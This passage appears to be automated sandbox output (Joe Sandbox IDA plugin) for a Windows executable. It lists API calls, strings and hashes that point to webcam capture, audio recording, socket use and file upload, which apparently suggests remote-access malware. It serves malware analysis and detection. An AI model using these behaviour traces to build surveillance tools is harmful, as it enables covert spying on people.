                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00419288), ref: 00401C8C
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00401C9B
                                                  • Part of subcall function 00411550: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 0041155F
                                                  • Part of subcall function 00411550: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 00411576
                                                  • Part of subcall function 00411550: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C), ref: 0041158C
                                                  • Part of subcall function 00411550: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 004115AA
                                                  • Part of subcall function 00411550: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 004115B4
                                                  • Part of subcall function 00411550: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 004115BD
                                                  • Part of subcall function 00411550: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 004115D2
                                                  • Part of subcall function 00411550: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 004115DF
                                                  • Part of subcall function 00411550: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 00411631
                                                  • Part of subcall function 00411550: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 0041163A
                                                  • Part of subcall function 00411550: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 00411643
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00401CEB
                                                • atoi.MSVCRT(00000000), ref: 00401CF2
                                                • Sleep.KERNEL32 ref: 00401D01
                                                  • Part of subcall function 00401E2D: __EH_prolog.LIBCMT ref: 00401E32
                                                  • Part of subcall function 00401E2D: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000000,?), ref: 00401E69
                                                  • Part of subcall function 00401E2D: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00419288,?,00419288,00419210), ref: 00401E90
                                                  • Part of subcall function 00401E2D: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00401EA7
                                                  • Part of subcall function 00401E2D: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00401EB4
                                                  • Part of subcall function 00401E2D: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00401EC1
                                                  • Part of subcall function 00401E2D: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00401ECB
                                                  • Part of subcall function 00401E2D: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000060), ref: 00401EE0
                                                  • Part of subcall function 00401E2D: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401EE9
                                                  • Part of subcall function 00401E2D: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401EF2
                                                  • Part of subcall function 00401E2D: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401EFB
                                                  • Part of subcall function 00401E2D: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401F04
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00401D38
                                                • atoi.MSVCRT(00000000), ref: 00401D3F
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00419210), ref: 00401D60
                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00401D9A
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00419210,00000000,CloseCamera,00000000,OpenCamera), ref: 00401DFE
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000001B), ref: 00401E19
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401E22
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@$V01@@$D@2@@0@Hstd@@V10@0@V?$basic_string@$?c_str@?$basic_string@?length@?$basic_string@V12@$?substr@?$basic_string@D@1@@atoi$??4?$basic_string@?data@?$basic_string@?find@?$basic_string@?size@?$basic_string@H_prologSleepV01@
                                                • String ID: CloseCamera$FreeFrame$GetFrame$OpenCamera
                                                • API String ID: 3050406488-3547787478
                                                • Opcode ID: 097334aa1b8e587c306b71286ad700abb771ea4d4b0a742b19a55e0c19a65946
                                                • Instruction ID: 0af599c8da93a3894906099d445701dbc1b414888c4f423a1fb39139a9bf170c
                                                • Opcode Fuzzy Hash: 097334aa1b8e587c306b71286ad700abb771ea4d4b0a742b19a55e0c19a65946
                                                • Instruction Fuzzy Hash: 78415771904215BBCF04BFB5DC19ADE3B68AB05706F0488BAF902A71F1DB789940CB9D
                                                APIs
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040C9FA
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040CA10
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040CA26
                                                  • Part of subcall function 004113E6: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00419970,00419BC8,00000000,00408808,)A,00000000,0000000B), ref: 004113F2
                                                  • Part of subcall function 004113E6: ??2@YAPAXI@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00411400
                                                  • Part of subcall function 004113E6: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00411422
                                                  • Part of subcall function 004113E6: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 00411444
                                                  • Part of subcall function 004113E6: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00411458
                                                  • Part of subcall function 004113E6: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00411461
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 0040CA48
                                                  • Part of subcall function 00403695: CreateFileW.KERNEL32(0000FDE8,80000000,00000000,00000000,00000003,00000080,00000000), ref: 004036C4
                                                  • Part of subcall function 00403695: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,00419288,?), ref: 004036E8
                                                  • Part of subcall function 00403695: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?), ref: 004036F2
                                                  • Part of subcall function 00403695: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000053,?,?,?,?,?,?), ref: 00403709
                                                  • Part of subcall function 00403695: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403A3C
                                                  • Part of subcall function 00403695: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403A45
                                                  • Part of subcall function 00403695: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403A4E
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040CA63
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,Uploaded file: ,00000000,?,00000000,?,00000000,00000000), ref: 0040CA9A
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CABF
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?,?,?,Uploaded file: ,00000000,?,00000000,?,00000000,00000000), ref: 0040CAAB
                                                  • Part of subcall function 00410CD2: GetLocalTime.KERNEL32(?), ref: 00410CE9
                                                  • Part of subcall function 00410CD2: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,%02i:%02i:%02i:%03i ,?,00414BC4,?,00413760,?,?,_E@,?), ref: 00410D1E
                                                  • Part of subcall function 00410CD2: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,_E@,?), ref: 00410D2B
                                                  • Part of subcall function 00410CD2: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,_E@,?), ref: 00410D38
                                                  • Part of subcall function 00410CD2: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,_E@,?), ref: 00410D45
                                                  • Part of subcall function 00410CD2: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,_E@,?), ref: 00410D4F
                                                  • Part of subcall function 00410CD2: printf.MSVCRT ref: 00410D56
                                                  • Part of subcall function 00410CD2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,_E@), ref: 00410D62
                                                  • Part of subcall function 00410CD2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,_E@), ref: 00410D6B
                                                  • Part of subcall function 00410CD2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,_E@), ref: 00410D74
                                                  • Part of subcall function 00410CD2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,_E@), ref: 00410D7D
                                                  • Part of subcall function 00410CD2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,_E@), ref: 00410D86
                                                  • Part of subcall function 00410CD2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,_E@), ref: 00410D8F
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,Failed to upload file: ,00000000,?,00000000,?,00000000,00000000), ref: 0040CAF5
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([ERROR],?,?,?,Failed to upload file: ,00000000,?,00000000,?,00000000,00000000), ref: 0040CB06
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CB1A
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040CB26
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000000), ref: 0040E4F8
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00000000), ref: 0040E501
                                                  • Part of subcall function 0041135A: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00000020,?,?,?,0040375E,?,?), ref: 00411369
                                                  • Part of subcall function 0041135A: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z.MSVCP60(00000000,?,?,0040375E,?,?), ref: 00411373
                                                  • Part of subcall function 0041135A: ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ.MSVCP60(?,?,0040375E,?,?), ref: 0041137C
                                                  • Part of subcall function 0041135A: ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,?,0040375E,?,?), ref: 00411386
                                                  • Part of subcall function 0041135A: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,?,0040375E,?,?), ref: 00411390
                                                  • Part of subcall function 0041135A: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,0040375E,?,?), ref: 004113A6
                                                  • Part of subcall function 0041135A: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,0040375E,?,?), ref: 004113AF
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@G@2@@std@@G@std@@$D@2@@0@Hstd@@V?$basic_string@$V01@@$?c_str@?$basic_string@D@1@@V10@0@V10@@$?begin@?$basic_string@?length@?$basic_string@V10@$??2@?end@?$basic_string@CreateFileG@1@@LocalTimeprintf
                                                • String ID: Failed to upload file: $Uploaded file: $[ERROR]$[INFO]
                                                • API String ID: 3287160187-712855673
                                                • Opcode ID: a1d25d8f91a5aa3a43bb048e395060911ec9b41036ded84efffd755b25654cf9
                                                • Instruction ID: 12224a6c5044153e60b47b7b8b22c70b5aff875ca01352e6d0e6ba24b0a9ab79
                                                • Opcode Fuzzy Hash: a1d25d8f91a5aa3a43bb048e395060911ec9b41036ded84efffd755b25654cf9
                                                • Instruction Fuzzy Hash: F1414F71900118ABDB14FBA1DC96DEE773CAB50306F0045AEF516A20A2EE385B85CF59
                                                APIs
                                                  • Part of subcall function 004113E6: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00419970,00419BC8,00000000,00408808,)A,00000000,0000000B), ref: 004113F2
                                                  • Part of subcall function 004113E6: ??2@YAPAXI@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00411400
                                                  • Part of subcall function 004113E6: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00411422
                                                  • Part of subcall function 004113E6: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 00411444
                                                  • Part of subcall function 004113E6: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00411458
                                                  • Part of subcall function 004113E6: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00411461
                                                • ?rfind@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIGI@Z.MSVCP60(0000005C,6C995E08,00000002,00000001), ref: 0040CFEA
                                                • ?substr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000001), ref: 0040CFFC
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,?,?), ref: 0040D011
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040D01B
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 0040D025
                                                • _wrename.MSVCRT ref: 0040D02C
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040D043
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,?,00413894), ref: 0040D05D
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040D074
                                                  • Part of subcall function 004031ED: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 00403203
                                                  • Part of subcall function 004031ED: FindFirstFileW.KERNEL32(00000000), ref: 0040320A
                                                  • Part of subcall function 004031ED: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,00419288,00000000,?,?,?,?), ref: 00403237
                                                  • Part of subcall function 004031ED: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00403241
                                                  • Part of subcall function 004031ED: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000054), ref: 00403258
                                                  • Part of subcall function 004031ED: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?), ref: 00403375
                                                  • Part of subcall function 004031ED: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?), ref: 0040337E
                                                  • Part of subcall function 004031ED: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?), ref: 00403387
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,Unable to rename file!,?,0041498C), ref: 0040D09B
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,0041498C), ref: 0040D0A5
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000059,?,?,?,?,?,0041498C), ref: 0040D0BF
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,0041498C), ref: 0040D0C8
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,0041498C), ref: 0040D0D1
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,0041498C), ref: 0040D54E
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000000), ref: 0040E4F8
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00000000), ref: 0040E501
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$U?$char_traits@$G@std@@$D@std@@G@2@@std@@$??1?$basic_string@$D@2@@std@@$Hstd@@V?$basic_string@$?c_str@?$basic_string@D@2@@0@$??0?$basic_string@V10@0@$G@2@@0@V01@@V10@$??2@?length@?$basic_string@?rfind@?$basic_string@?substr@?$basic_string@FileFindFirstG@1@@V10@@V12@_wrename
                                                • String ID: Unable to rename file!
                                                • API String ID: 1823037954-1452241502
                                                • Opcode ID: d0f4c173e57031bc07afc8f6764ca3c21498b33cdb1541796f51a5575a0bbaa9
                                                • Instruction ID: 1e98e751280b6c33166822e53399df0344e94b3bf9c8faeafb357a345ac408a3
                                                • Opcode Fuzzy Hash: d0f4c173e57031bc07afc8f6764ca3c21498b33cdb1541796f51a5575a0bbaa9
                                                • Instruction Fuzzy Hash: CE314F72901119AFCF04FFA0EC4A9EE7738EB14305F1045BAF502A20A1EE785B48CB59
                                                APIs
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00401536
                                                • closesocket.WS2_32 ref: 00401561
                                                • ExitThread.KERNEL32 ref: 0040156F
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000020,?,00419288,00000000), ref: 00401598
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(004191F8,00000012,?,00419288,00000000), ref: 004015AE
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 004015B9
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 004015C6
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 004015D3
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 004015E0
                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004015EC
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004015F5
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004015FE
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401607
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401610
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401619
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401622
                                                • waveInUnprepareHeader.WINMM(-004191BC,00000020), ref: 0040163F
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00401664
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004016AE
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@D@2@@0@Hstd@@V10@0@V?$basic_string@$D@1@@$V01@@$??4?$basic_string@ExitHeaderThreadUnprepareV01@closesocketwave
                                                • String ID:
                                                • API String ID: 3470141593-0
                                                • Opcode ID: d8c501ab1854760ca6ac13045f06aa9764cfa75bd814278a5828c8da87223c58
                                                • Instruction ID: e83644768408e7e800a9075f0c35efe2669a5e6e9277dde0074148620c4dfc27
                                                • Opcode Fuzzy Hash: d8c501ab1854760ca6ac13045f06aa9764cfa75bd814278a5828c8da87223c58
